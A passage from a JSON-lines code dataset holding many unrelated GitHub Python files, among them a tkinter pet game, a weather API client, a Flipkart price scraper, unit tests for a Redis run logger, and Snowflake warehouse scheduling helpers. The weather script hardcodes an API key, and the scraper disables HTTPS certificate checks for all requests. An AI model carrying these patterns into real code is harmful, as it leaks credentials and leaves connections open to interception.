tk.Button(root, bg='#000', fg='white', height = 2, width = 10, text=\"ASUSTAR\",\n command=lambda: accion(5))\naccion6.place(x=135, y=400)\n\naccion7 = tk.Button(root, bg='#000', fg='white', height = 2, width = 10, text=\"PASEAR\",\n command=lambda: accion(6))\naccion7.place(x=225, y=400)\n\naccion8 = tk.Button(root, bg='#000', fg='white', height = 2, width = 10, text=\"BAÑAR\",\n command=lambda: accion(7))\naccion8.place(x=315, y=400)\n\naccion9 = tk.Button(root, bg='#000', fg='white', height = 2, width = 10, text=\"INYECTAR\",\n command=lambda: accion(8))\naccion9.place(x=405, y=400)\n\naccion10 = tk.Button(root, bg='#000', fg='white', height = 2, width = 10, text=\"MATAR\",\n command=lambda: accion(9))\naccion10.place(x=495, y=400)\n\n\nroot.mainloop()\nprint(tamagotchi.name)\n","repo_name":"Zurol/UAD-IntroduccionProgramacion","sub_path":"tamagotchi.py","file_name":"tamagotchi.py","file_ext":"py","file_size_in_byte":5091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28680781388","text":"#!/Users/sdaniels/.pyenv/shims/python3\nimport sys\nimport requests\n\n#http://api.weatherapi.com/v1/current.json?key=98acecba0026494aa06204227210412&q=Austin&aqi=no\n\nWEATHER_API_KEY = \"98acecba0026494aa06204227210412\"\n\nuser_input = input(\"Choose city:\\n1: Austin\\n2: Chicago\\n3: Tampa\\n\")\n\ncity = None\n\nif user_input == \"1\":\n\tcity = \"Austin\"\nelif user_input == \"2\":\n\tcity = \"Chicago\"\nelif user_input == \"3\":\n\tcity = \"Tampa\"\nelse:\n\tprint(\"Not a valid selection.\")\n\tsys.exit(1)\n\nprint(\"You selected \" + city)\n\nurl = \"http://api.weatherapi.com/v1/current.json?key=%s&q=%s&aqi=no\"%(WEATHER_API_KEY, city)\nresponce = requests.get(url=url)\n\nweather_dictionary = responce.json()\n\ntemp = weather_dictionary[\"current\"][\"temp_f\"]\nwind = weather_dictionary[\"current\"][\"wind_mph\"]\nfeels = weather_dictionary[\"current\"][\"feelslike_f\"]\nprint(\"The temperature in %s is %s F\"%(city, temp))\nprint(\"The wind in %s is %s mph\"%(city, wind))\nprint(\"Feels like the temperature in %s is %s F\"%(city, feels))\n#Faaag\n#Number2\n#I see some new changes.\n","repo_name":"notsure44/brian-repo","sub_path":"weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17760578333","text":"import json\nimport pathlib\nfrom datetime import datetime, timedelta, timezone\nfrom typing import Any\n\nfrom .models import point_name\nfrom .wbgt_util import wbgt_status\n\n\nclass wbgt_point:\n def __init__(\n self,\n ido: float,\n keido: float,\n month: int,\n day: int,\n hour: int,\n severity: int,\n type: str = \"Feature\",\n ) -> None:\n self.type: str = type\n self.geometry: dict[str, Any] = {\"type\": \"Point\", \"coordinates\": (keido, ido)}\n self.properties: dict[str, Any] = {\"Month\": month, \"Day\": day, \"Hour\": hour, \"severity\": severity}\n\n\nclass com_geojson:\n def __init__(self, type: str = \"FeatureCollection\"):\n self.type = type\n self.features: list[dict[str, Any]] = []\n\n\n# jp = json.dumps(p.__dict__)\n# print(jp)\n\n\ndef data2geojson(file_name: str = \"info.geojson\", force: bool = False):\n target = pathlib.Path(__file__).parent / \"static\" / file_name\n\n date: int = datetime.now(timezone(timedelta(hours=9), \"JST\")).day\n\n if force or not target.exists():\n print(\"Generate GeoJson\")\n\n g = com_geojson()\n\n for point in point_name.objects.all():\n try:\n for time, wbgt in zip(point.wbgt_time_json[\"time\"], point.wbgt_time_json[\"wbgt\"]):\n month, day, hour = time.split(\"/\")\n\n for v in wbgt_status.values():\n if v.min <= wbgt < v.max:\n severity = v.level\n break\n else:\n severity = 0\n\n g.features.append(\n wbgt_point(\n ido=point.ido,\n keido=point.keido,\n month=int(month),\n day=int(day),\n hour=int(hour.split(\":\")[0]) + 24 * (date != int(day)),\n severity=severity,\n ).__dict__\n )\n except TypeError:\n pass\n\n with open(target, mode=\"w+\") as f:\n\n json.dump(g.__dict__, f)\n","repo_name":"tsfmDevTeam/TemperatureSenseForecastMap","sub_path":"app/db2geojson.py","file_name":"db2geojson.py","file_ext":"py","file_size_in_byte":2158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71603976489","text":"import logging\nfrom unittest import TestCase\n\nfrom runlog import CancelLog, RunLogger\n\n\nclass RunloggerTests(TestCase):\n\n def setUp(self):\n self.rl = RunLogger(redis_config={'db': 3}, max_logs=4)\n self.rl._redis.flushdb()\n\n def log_all_the_things(self):\n self.rl.debug(\"DEBUG\")\n self.rl.info(\"INFO\")\n self.rl.warn(\"WARN\")\n self.rl.warning(\"WARNING\")\n self.rl.error(\"ERROR\")\n self.rl.critical(\"CRITICAL\")\n try:\n raise Exception(\"Exception!\")\n except Exception as ex:\n self.rl.exception(ex)\n\n def test_no_logs_outside_of_context_manager(self):\n self.log_all_the_things()\n self.assertEqual(self.rl.list_jobs(), [])\n\n def test_log_a_job(self):\n with self.rl.runlog('foo') as logger:\n logger.setLevel(logging.DEBUG)\n self.log_all_the_things()\n self.assertEqual(self.rl.list_jobs(), [b'foo'])\n self.assertEqual(len(self.rl.list_runs('foo')), 1)\n run_id = self.rl.list_runs('foo')[0].decode()\n log = self.rl.get_log('foo', run_id)\n self.assertEqual(len(log), 7)\n self.assertEqual(log[:6], [b'DEBUG',\n b'INFO',\n b'WARN',\n b'WARNING',\n b'ERROR',\n b'CRITICAL'])\n self.assertTrue(log[6].startswith(b'Exception!\\n'))\n start, end = self.rl.run_times('foo', run_id)\n self.assertTrue(0 < float(end) - float(start) < 1)\n\n def test_log_a_job_that_blows_up(self):\n\n def log_blows_up():\n with self.rl.runlog('foo') as logger:\n logger.setLevel(logging.DEBUG)\n self.log_all_the_things()\n raise Exception(\"Kaboom!\")\n\n self.assertRaises(Exception, log_blows_up)\n self.assertEqual(self.rl.list_jobs(), [b'foo'])\n self.assertEqual(len(self.rl.list_runs('foo')), 1)\n log = self.rl.get_log('foo', self.rl.list_runs('foo')[0].decode())\n self.assertEqual(len(log), 8)\n self.assertEqual(log[:6], [b'DEBUG',\n b'INFO',\n b'WARN',\n b'WARNING',\n b'ERROR',\n b'CRITICAL'])\n self.assertTrue(log[6].startswith(b'Exception!\\n'))\n self.assertTrue(log[7].startswith(b'Kaboom!\\n'))\n\n def test_log_already_running(self):\n\n def log_already_running():\n with self.rl.runlog('foo') as logger:\n logger.setLevel(logging.DEBUG)\n with self.rl.runlog('bar') as logger:\n self.log_all_the_things()\n\n self.assertRaises(Exception, log_already_running)\n self.assertEqual(self.rl.list_jobs(), [b'foo'])\n self.assertEqual(len(self.rl.list_runs('foo')), 1)\n log = self.rl.get_log('foo', self.rl.list_runs('foo')[0].decode())\n self.assertEqual(len(log), 1)\n self.assertTrue(log[0].startswith(b\"Can't start bar.\"))\n\n def test_log_cancel(self):\n\n with self.rl.runlog('foo') as logger:\n logger.setLevel(logging.DEBUG)\n raise CancelLog\n\n self.assertEqual(self.rl.list_jobs(), [b'foo'])\n self.assertEqual(len(self.rl.list_runs('foo')), 0)\n\n def test_max_logs(self):\n\n for _ in range(5):\n with self.rl.runlog('foo') as logger:\n logger.setLevel(logging.DEBUG)\n self.log_all_the_things()\n\n self.assertEqual(self.rl.list_jobs(), [b'foo'])\n self.assertEqual(len(self.rl.list_runs('foo')), 4)\n","repo_name":"lukearno/runlog","sub_path":"tests/test_logging.py","file_name":"test_logging.py","file_ext":"py","file_size_in_byte":3715,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"13301050596","text":"\nfrom collections import defaultdict\nfrom typing import List\n\n\nclass Solution:\n def numberOfSubarrays(self, nums: List[int], k: int) -> int:\n \n for i in range(len(nums)):\n nums[i]= 1 if (nums[i]%2 != 0) else 0\n \n prefixSum , count = 0,0\n dic = defaultdict(int)\n \n for i in range(len(nums)):\n prefixSum += nums[i]\n \n if prefixSum ==k:\n count +=1\n if prefixSum-k in dic:\n count += dic[prefixSum-k]\n dic[prefixSum] = dic.get(nums[i], 0) + 1\n return count\n \n \n \n ","repo_name":"oumburs9/Competitive-Programming","sub_path":"Leet Code Problems/Medium problems/#1248 Count Number of Nice Subarrays -medium.py","file_name":"#1248 Count Number of Nice Subarrays -medium.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5110269643","text":"import numpy as np\nfrom grabScreen import grab_screen\nfrom getKeys import Check_pressed\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras.models import load_model\n\nimport cv2\nimport time\nimport keyboard\n\n\n\n\n\nmodel = load_model('C:/Users/bytes 2.0/Desktop/Projects/drivingModel4')\n\n\ndef forward():\n keyboard.press('i')\n keyboard.release('j')\n keyboard.release('k')\n keyboard.release('l')\n \ndef forward_left():\n keyboard.press('i')\n keyboard.press('j')\n keyboard.release('k')\n keyboard.release('l')\n\ndef forward_right():\n keyboard.press('i')\n keyboard.press('l')\n keyboard.release('j')\n keyboard.release('k')\n\n\ndef left():\n keyboard.press('j')\n keyboard.release('l')\n keyboard.release('k')\n keyboard.release('l')\n\ndef right():\n keyboard.press('l')\n keyboard.release('j')\n keyboard.release('k')\n keyboard.release('i')\n\ndef backwards():\n keyboard.press('k')\n keyboard.release('j')\n keyboard.release('l')\n keyboard.release('i')\n\n\n\n\ndef main():\n for i in range(0,5):\n print(i+1)\n time.sleep(1)\n \n stopped = True\n while True:\n \n if not stopped:\n screen = grab_screen(region=(0,317,790,600))\n screen = cv2.resize(screen, (200,150))\n screen = cv2.cvtColor(screen, cv2.COLOR_BGR2GRAY)\n \n prediction = model.predict([screen.reshape(-1,150,200,1)])[0]\n moves = list(np.around(prediction))\n print(moves)\n \n if moves == [1,0,0,0,0,0,0]:\n forward()\n elif moves == [0,1,0,0,0,0,0]:\n right()\n elif moves == [0,0,1,0,0,0,0]:\n backwards()\n elif moves == [0,0,0,1,0,0,0]:\n left()\n elif moves == [0,0,0,0,0,1,0]:\n forward_left()\n elif moves == [0,0,0,0,0,0,1]:\n forward_right()\n \n \n keys = Check_pressed()\n \n if 'T' in keys:\n if stopped == True:\n stopped = False\n time.sleep(1)\n else:\n stopped = True\n keyboard.release('k')\n keyboard.release('j')\n keyboard.release('l')\n keyboard.release('i')\n time.sleep(1)\n \n \n \nif __name__ == \"__main__\":\n main()","repo_name":"404dn/Self-Driving-NN","sub_path":"Self-Driving-NeuralNetwork/source/TestModel.py","file_name":"TestModel.py","file_ext":"py","file_size_in_byte":2424,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"3376454413","text":"\"\"\"\nfetch_data module\n15 November 2018\n\"\"\"\n\n\n#extract data from website\nimport os, ssl\nif (not os.environ.get('PYTHONHTTPSVERIFY', '') and\n getattr(ssl, '_create_unverified_context', None)): \n ssl._create_default_https_context = ssl._create_unverified_context\n\nimport urllib2\nfrom bs4 import BeautifulSoup\n\ndef get_data(source):\n\n\treq = urllib2.Request(source)\n\tresponse = urllib2.urlopen(req)\n\n\ttext = response.read()\n\n\tresponse.close()\n\n\ttext = BeautifulSoup(text, \"html.parser\").get_text(strip=True)\n\n\treturn text\n\n\n","repo_name":"jusco84/first-python-proj","sub_path":"markov_chain/fetch_data.py","file_name":"fetch_data.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5745031634","text":"from openpyxl import load_workbook\nimport re\n\n\nexcel_file2 = 'Book2_test.xlsx'\nwb2 = load_workbook(excel_file2) # book_1\nws2 = wb2[\"Sheet1\"] # sh_1\n\n\nws = wb2.active \nmaxValue=9643\n\ndef wordfinder(searchData):\n for i in range(1, ws.max_row + 1):\n \n for j in range(2, ws.max_column + 1):\n if j != 2:\n pass\n elif searchData == ws.cell(i,j).value:\n print(\"Encontrado: \",(ws.cell(i,j)).value )\n print(ws.cell(i,j))\n print(wb2.sheetnames) \n\n\n\n\nwordfinder(maxValue)\n\nlistamayor=[1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26]\nprint(listamayor)\n\n\nfor x in listamayor:\n if 263 == x:\n print(\"Encontre al 26\")\n\n\n","repo_name":"Abisoft77/buscarValorExcel","sub_path":"buscar.py","file_name":"buscar.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13810601266","text":"import os\nimport sys\nimport txconfig\n\nfrom txconfig import TX_ROOT\n\nsys.path = sys.path + [os.path.join(TX_ROOT, 'tools')]\nfrom building import *\n\nTARGET = 'threadx.' + txconfig.TARGET_EXT\n\nenv = Environment(tools = ['mingw'],\n AS = txconfig.AS, ASFLAGS = txconfig.AFLAGS,\n CC = txconfig.CC, CCFLAGS = txconfig.CFLAGS,\n CXX = txconfig.CC, CXXFLAGS = txconfig.CXXFLAGS,\n AR = txconfig.AR, ARFLAGS = '-rc',\n LINK = txconfig.LINK, LINKFLAGS = txconfig.LFLAGS)\nenv.PrependENVPath('PATH', txconfig.EXEC_PATH)\n\nExport('TX_ROOT')\nExport('txconfig')\n\n# prepare building environment\nobjs = PrepareBuilding(env, TX_ROOT, has_libcpu=True)\n\n# include Packages\n#if os.getenv('PKG_ROOT'):\n# PKG_ROOT = os.getenv('PKG_ROOT')\n# objs.extend(SConscript(os.path.join(PKG_ROOT, 'SConscript')))\n \n# make a building\nDoBuilding(TARGET, objs)\n","repo_name":"yygg/threadx-platform","sub_path":"bsp/Nuvoton/NUC029/SConstruct","file_name":"SConstruct","file_ext":"","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"86583648772","text":"#!/usr/bin/env python3\n\nfrom rctf import golf\nimport os\n\nrate = 1 / 12\nbase = 1\n\nprint(golf.calculate_limit(\n 'https://staging.redpwn.net/' if os.environ.get('DEBUG') else 'https://2020.redpwn.net/',\n 'kevin-higgs', # challenge id\n 1592769600, # CTF start date\n lambda hours : int(base + (hours * rate))\n))\n","repo_name":"redpwn/redpwnctf-2020-challenges","sub_path":"pwn/kevin-higgs/limit.py","file_name":"limit.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","stars":63,"dataset":"github-code","pt":"53"} +{"seq_id":"75221267688","text":"import numpy, random, math\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Activation\n\ndef creatraindata(amount):\n temp = []\n for i in range(amount):\n temp.append([random.randint(0, 500), random.randint(0, 500), random.randint(0, 500), random.randint(0, 500)])\n return temp\n\ndef getclosest(inputs):\n distance = 1000\n maxdist = 10\n x, y, tx, ty = inputs\n while distance > maxdist:\n angle = random.randint(-90,90)\n power = random.randint(0,100)\n distance = simulatebullet(angle, power, (x, y), (tx, ty))\n \n return [power, angle]\n\ndef simulatebullet(angle, power, selfpos, enemypos):\n bulletx, bullety = selfpos\n bulletmx = math.sin(math.radians(angle))*power/2\n bulletmy = math.cos(math.radians(angle))*power/2\n alive = True\n \n while alive:\n bulletx = bulletx + bulletmx/5\n bullety = bullety + bulletmy/5\n bulletmy = bulletmy - 1/5\n if bulletx > 1000 or bulletx < 0 or bullety < 0:\n alive = 0\n elif bulletmy < 0 and bullety < enemypos[1]:\n alive = 0\n\n offsetx = bulletx - enemypos[0]\n offsety = bullety - enemypos[1]\n return(math.sqrt(math.pow(offsetx, 2) + math.pow(offsety, 2)))\n\n\ndef generatetrainigdata(amount):\n tempin = creatraindata(amount)\n tempout = []\n for i, data in enumerate(tempin):\n if i % 10 == 0:\n print(str(int(i/amount*100)) + '%')\n powerraw, angleraw = getclosest(data)\n power = powerraw/100\n angle = (angleraw + 90)/180\n tempout.append([power, angle])\n\n return tempin, tempout\n\nprint(\"creating test data\")\ninputs, outputs = generatetrainigdata(10000)\n\nnumpyinput = numpy.array(inputs)\nnumpyoutput = numpy.array(outputs)\n\nprint(\"building model\")\nmodel = Sequential()\nmodel.add(Dense(4, input_shape=(4,)))\nmodel.add(Activation('relu'))\nmodel.add(Dense(128))\nmodel.add(Activation('relu'))\nmodel.add(Dense(64))\nmodel.add(Activation('relu'))\nmodel.add(Dense(32))\nmodel.add(Activation('relu'))\nmodel.add(Dense(8))\nmodel.add(Activation('relu'))\nmodel.add(Dense(2))\nmodel.add(Activation('sigmoid'))\n\nmodel.compile(optimizer='sgd', loss='mse', metrics=['acc'])\n\nprint(\"training\")\nmodel.fit(numpyinput, numpyoutput, epochs=150, batch_size=10)\n\nprint(model.evaluate(numpyinput, numpyoutput))\nmodel.save(\"model.h5\")","repo_name":"jaxarthur/tankgamepython","sub_path":"src/resources/NN/aiming/trainaiming.py","file_name":"trainaiming.py","file_ext":"py","file_size_in_byte":2343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37151171684","text":"import connection\nfrom crud.wh_sched import WarehouseSchedules\nfrom crud.errors import summarize_error\nfrom typing import Optional, List, Tuple\nimport datetime\n\n\ndef create_callback(data, row, **additions):\n if row is None:\n row = WarehouseSchedules.construct(\n name=\"__empty__placeholder__\",\n size=\"X-Small\",\n suspend_minutes=0,\n resume=True,\n scale_min=1,\n scale_max=1,\n warehouse_mode=\"\",\n )\n for k, v in additions.items():\n setattr(row, k, v)\n return (row, data)\n\n\ndef populate_initial(warehouse):\n # WarehouseSchedules.create_table(connection.Connection.get())\n warehouses = WarehouseSchedules.batch_read(connection.Connection.get(), \"start_at\")\n if any(i for i in warehouses if i.name == warehouse) == 0:\n wh = describe_warehouse(warehouse)\n wh.write(connection.Connection.get())\n warehouses.append(wh)\n wh2 = describe_warehouse(warehouse)\n wh2.weekday = False\n wh2.write(connection.Connection.get())\n warehouses.append(wh2)\n return warehouses\n\n\ndef describe_warehouse(warehouse):\n wh_df = connection.execute(f\"show warehouses like '{warehouse}'\")\n wh_dict = wh_df.T[0].to_dict()\n return WarehouseSchedules(\n name=warehouse,\n size=wh_dict[\"size\"],\n suspend_minutes=int(wh_dict[\"auto_suspend\"] or 0) // 60,\n resume=wh_dict[\"auto_resume\"],\n scale_min=wh_dict.get(\"min_cluster_count\", 0),\n scale_max=wh_dict.get(\"max_cluster_count\", 0),\n warehouse_mode=wh_dict.get(\"scaling_policy\", \"Standard\"),\n )\n\n\ndef convert_time_str(time_str) -> datetime.time:\n return datetime.datetime.strptime(time_str, \"%I:%M %p\").time()\n\n\ndef verify_and_clean(\n data: List[WarehouseSchedules], ignore_errors=False\n) -> Tuple[Optional[str], List[WarehouseSchedules]]:\n if data[0].start_at != datetime.time(0, 0):\n if ignore_errors:\n data[0].start_at = datetime.time(0, 0)\n data[0]._dirty = True\n else:\n return \"First row must start at midnight.\", data\n if data[-1].finish_at != datetime.time(23, 59):\n if ignore_errors:\n data[-1].finish_at = datetime.time(23, 59)\n data[0]._dirty = True\n else:\n return \"Last row must end at midnight.\", data\n next_start = data[0]\n for row in data[1:]:\n if row.start_at != next_start.finish_at:\n next_start.finish_at = row.start_at\n next_start._dirty = True\n if row.warehouse_mode == \"Inherit\":\n row.warehouse_mode = next_start.warehouse_mode\n row._dirty = True\n next_start = row\n try:\n [i.validate(i.dict()) for i in data]\n except Exception as e:\n return summarize_error(\"Verify failed\", e), data\n return None, [i for i in data if i._dirty]\n\n\ndef flip_enabled(wh_name: str):\n connection.execute(\n f\"update internal.{WarehouseSchedules.table_name} set enabled = not enabled where name = '{wh_name}'\"\n )\n\n\ndef time_filter(\n max_finish: datetime.time, min_start: datetime.time, is_start: bool\n) -> List[str]:\n hours = [12] + list(range(1, 12))\n minutes = list(range(0, 60, 15))\n ampm = [\"AM\", \"PM\"]\n times = [f\"{h:02}:{m:02} {a}\" for a in ampm for h in hours for m in minutes]\n base_times = times + [\"11:59 PM\"]\n if is_start:\n return [\n i\n for i in base_times\n if convert_time_str(i) > min_start and convert_time_str(i) < max_finish\n ]\n else:\n return base_times\n","repo_name":"sundeck-io/OpsCenter","sub_path":"app/ui/warehouse_utils.py","file_name":"warehouse_utils.py","file_ext":"py","file_size_in_byte":3591,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} +{"seq_id":"42297494071","text":"from script.point import Point\nfrom script.plot import plot\nfrom settings import square_size, point_count\n\n\ndef main():\n Point.create_points(point_count)\n square = Point.most_concentration(square_size)\n first = Point.first_point(Point.close_points_list)\n connected_points = Point.closest_point(first)\n print(\"Balance =\", Point.budget * 1000)\n x, y = Point.points_x_y()\n plot(x, y, square, connected_points)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"AlphazCode/Practice_Railroad_Tycoon","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18541340174","text":"import re\nfrom urllib.parse import urlparse, parse_qs\nfrom urllib.parse import ParseResult\nfrom logging import Logger,LoggerAdapter\n\n\nclass PaginationCheck():\n\n # ページネーションで追加済みのurlリスト\n pagination_selected_urls: set[str] = set()\n\n def check(self, link_url: str, crawl_target_urls: list, logger: LoggerAdapter, spider_name: str) -> bool:\n '''\n チェックしたいurl(link_url)に対して、既にクロール対象となったurl(crawl_target_urls)の別ページかチェックを行う。\n '''\n check_flg: bool = False # ページネーションのリンクの場合、Trueとする。\n # チェック対象のurlを解析\n link_parse: ParseResult = urlparse(link_url)\n # 解析したクエリーをdictへ変換 page=2&a=1&b=2 -> {'page': ['2'], 'a': ['1'], 'b': ['2']}\n link_query: dict = parse_qs(link_parse.query)\n\n # 追加リクエスト済み情報の準備\n pagination_selected_pathes: set = set()\n pagination_selected_same_path_queries: list = []\n for pagination_selected_url in self.pagination_selected_urls:\n _ = urlparse(pagination_selected_url)\n pagination_selected_pathes.add(_.path)\n if link_parse.path == _.path:\n pagination_selected_same_path_queries.append(parse_qs(_.query))\n\n # sitemapから取得したurlより順にチェック\n for _ in crawl_target_urls:\n # sitemapから取得したurlを解析\n crawl_target_parse: ParseResult = urlparse(_)\n # netloc(hostnameだけでなくportも含む)が一致すること\n if crawl_target_parse.netloc == link_parse.netloc:\n # まだ同一ページの追加リクエストされていない場合(path部分で判定)\n if not link_parse.path in pagination_selected_pathes:\n # パスの末尾にページが付与されているケースの場合、追加リクエストの対象とする。\n # 例)https://www.sankei.com/article/20210321-VW5B7JJG7JKCBG5J6REEW6ZTBM/\n # https://www.sankei.com/article/20210321-VW5B7JJG7JKCBG5J6REEW6ZTBM/2/\n _ = re.compile(r'/[0-9]{1,3}/*$')\n if re.search(_, link_parse.path):\n # pathの末尾のページ情報を削除\n # 例)〜OYT1T50226/2/ -> 〜OYT1T50226\n link_type1 = _.sub('', link_parse.path)\n # 末尾のスラッシュがあれば削除\n _ = re.compile(r'/$')\n crawl_type1 = _.sub('', crawl_target_parse.path)\n # ページ情報部を除いて比較し一致した場合\n if crawl_type1 == link_type1:\n logger.info(\n f'=== {spider_name} ページネーション(type1) : {link_url}')\n check_flg = True\n\n # 拡張子除去後の末尾にページが付与されているケースの場合、追加リクエストの対象とする。\n # 例)https://www.sankei.com/politics/news/210521/plt2105210030-n1.html\n # https://www.sankei.com/politics/news/210521/plt2105210030-n2.html\n _ = re.compile(r'[^0-9][0-9]{1,3}\\.(html|htm)$')\n if re.search(_, link_parse.path):\n # 例)〜n1.html -> 〜n\n link_type2 = _.sub('', link_parse.path)\n crawl_type2 = _.sub('', crawl_target_parse.path)\n # 末尾の拡張子やページ情報を除いて比較し一致した場合\n if crawl_type2 == link_type2:\n logger.info(\n f'=== {spider_name} ページネーション(type2) : {link_url}')\n check_flg = True\n\n # クエリーにページが付与されているケースの場合、追加リクエストの対象とする。\n # ただし、以下の場合は対象外。\n # ・既に同一ページの追加リクエスト済みの場合。\n # ・1ページ目の場合。※sitemap側でリクエスト済みのため。\n # 例)https://webronza.asahi.com/national/articles/2022042000004.html\n # https://webronza.asahi.com/national/articles/2022042000004.html?a=b&c=d\n # https://webronza.asahi.com/national/articles/2022042000004.html?page=1&a=b&e=f\n # https://webronza.asahi.com/national/articles/2022042000004.html?page=1&m=n&g=h\n # https://webronza.asahi.com/national/articles/2022042000004.html?page=2&a=b&e=f\n # https://webronza.asahi.com/national/articles/2022042000004.html?page=2&m=n&g=h\n if crawl_target_parse.path == link_parse.path:\n # リンクのクエリーにページ指定と思われるkeyの存在チェック (複数該当することは無いことを祈る、、、)\n page_keys = ['page', 'pagination', 'pager', 'p']\n link_query_selected_items: list[tuple] = []\n for link_query_key, link_query_value in link_query.items():\n if link_query_key in page_keys:\n link_query_selected_items.append(\n (link_query_key, link_query_value))\n\n # linkにpege系クエリーがあった場合、\n for link_query_selected_item in link_query_selected_items:\n check_flg = True\n for same_path_query in pagination_selected_same_path_queries:\n # keyが一致\n if link_query_selected_item[0] in same_path_query:\n # valueが一致(同一ページ)した場合は対象外\n if link_query_selected_item[1][0] == same_path_query[link_query_selected_item[0]][0]:\n check_flg = False\n # page=1は対象外\n elif link_query_selected_item[1][0] == str(1):\n check_flg = False\n if check_flg:\n logger.info(\n f'=== {spider_name} ページネーション(type3) : {link_url}')\n\n # クロール対象となったurlを保存\n if check_flg:\n self.pagination_selected_urls.add(link_url)\n\n return check_flg\n","repo_name":"pubranko/BrownieAtelier","sub_path":"app/news_crawl/spiders/common/pagination_check.py","file_name":"pagination_check.py","file_ext":"py","file_size_in_byte":6820,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39940263212","text":"import os\r\nimport re\r\nimport sys\r\nimport requests\r\nimport pandas as pd\r\nimport unicodedata\r\nfrom bs4 import BeautifulSoup as bs\r\nfrom datetime import datetime\r\nfrom pytz import timezone\r\nimport logging\r\nimport logging.handlers\r\n\r\n\r\n\r\ndef extract_from_URL(url):\r\n ''' Extracts the product name and price from the URL and returns a list\r\n\r\n Args:\r\n url (str): URL of the product\r\n\r\n Returns:\r\n list: [product_name, price, time_now]\r\n '''\r\n\r\n # Check if URL is valid\r\n if not url.startswith(url):\r\n return None\r\n \r\n # Create a session object for the requests\r\n session = requests.Session()\r\n\r\n # Make the request using the session object\r\n request = session.get(url)\r\n\r\n # if request was successful\r\n if request.status_code != 200:\r\n return None\r\n \r\n # HtML prasing\r\n soup = bs(request.content,'html.parser')\r\n\r\n # Check product name is present on the page\r\n product_name_elem = soup.find(\"span\",{\"class\":\"B_NuCI\"})\r\n if not product_name_elem:\r\n return None\r\n \r\n # Extract and normalize the product name\r\n product_name = unicodedata.normalize(\"NFKD\", product_name_elem.get_text())\r\n\r\n # Check if price is present on the page\r\n price_elem = soup.find(\"div\",{\"class\":\"_30jeq3 _16Jk6d\"})\r\n if not price_elem:\r\n return None\r\n \r\n # Extract the price\r\n price = int(''.join(re.findall(r'\\d+', price_elem.get_text())))\r\n \r\n # Get the current time from the timezone\r\n # time_now = datetime.now(timezone(\"Asia/Kolkata\")).strftime('%Y-%m-%d %H:%M')\r\n\r\n return [product_name, price]\r\n\r\nURL= \"https://www.flipkart.com/apple-iphone-14-pro-max-space-black-128-gb/p/itm9aed88fe43457?pid=MOBGHWFHCNVGGMZF&lid=LSTMOBGHWFHCNVGGMZFEEIZN3&marketplace=FLIPKART&q=iphone+14+pro+max&store=tyy%2F4io&srno=s_1_1&otracker=AS_QueryStore_OrganicAutoSuggest_2_9_na_na_na&otracker1=AS_QueryStore_OrganicAutoSuggest_2_9_na_na_na&fm=organic&iid=6e7af0b4-e3cc-48d5-a304-7e8aadce016a.MOBGHWFHCNVGGMZF.SEARCH&ppt=hp&ppn=homepage&ssid=w0apy6ro0g0000001681107610607&qH=37e37d60a349d989\"\r\noutput = extract_from_URL(URL)\r\n\r\n# logger object name specified\r\nlogger = logging.getLogger(output[0])\r\nlogger.setLevel(logging.DEBUG)\r\nlogger_file_handler = logging.handlers.RotatingFileHandler(\r\n \"capture.log\", # name of the file\r\n maxBytes=1024 * 1024,\r\n backupCount=1,\r\n encoding=\"utf8\",\r\n )\r\n\r\n# formatter to log objects\r\nformatter = logging.Formatter(\"%(name)s; %(message)s; %(asctime)s\")\r\nlogger_file_handler.setFormatter(formatter)\r\nlogger.addHandler(logger_file_handler)\r\n\r\n\r\n# log message\r\nlogger.info(int(output[1]))","repo_name":"Pramod07Ch/Price-Tracker-using-GitHub-Actions","sub_path":"log_info.py","file_name":"log_info.py","file_ext":"py","file_size_in_byte":2705,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"3452697085","text":"#!/usr/bin/python\n\nimport argparse\nfrom collections import namedtuple\n\nSequence = namedtuple('Sequence', ['directions'])\n\n\n# Tile coordinates:\n# - x-axis: positive from northwest to southeast\n# - y-axis: positive from southwest to northeast\nclass Direction(object):\n WEST = (-1, -1)\n EAST = (+1, +1)\n SOUTHWEST = (0, -1)\n SOUTHEAST = (+1, 0)\n NORTHWEST = (-1, 0)\n NORTHEAST = (0, +1)\n\n ALL = [WEST, EAST, SOUTHWEST, SOUTHEAST, NORTHWEST, NORTHEAST]\n\n\ndef parse_sequences(lines):\n result = []\n for line in lines:\n chars = list(line)\n directions = []\n while chars:\n c1 = chars.pop(0)\n if c1 == 'e' or c1 == 'w':\n directions.append(Direction.EAST if c1 ==\n 'e' else Direction.WEST)\n else:\n c2 = chars.pop(0)\n if c1 == 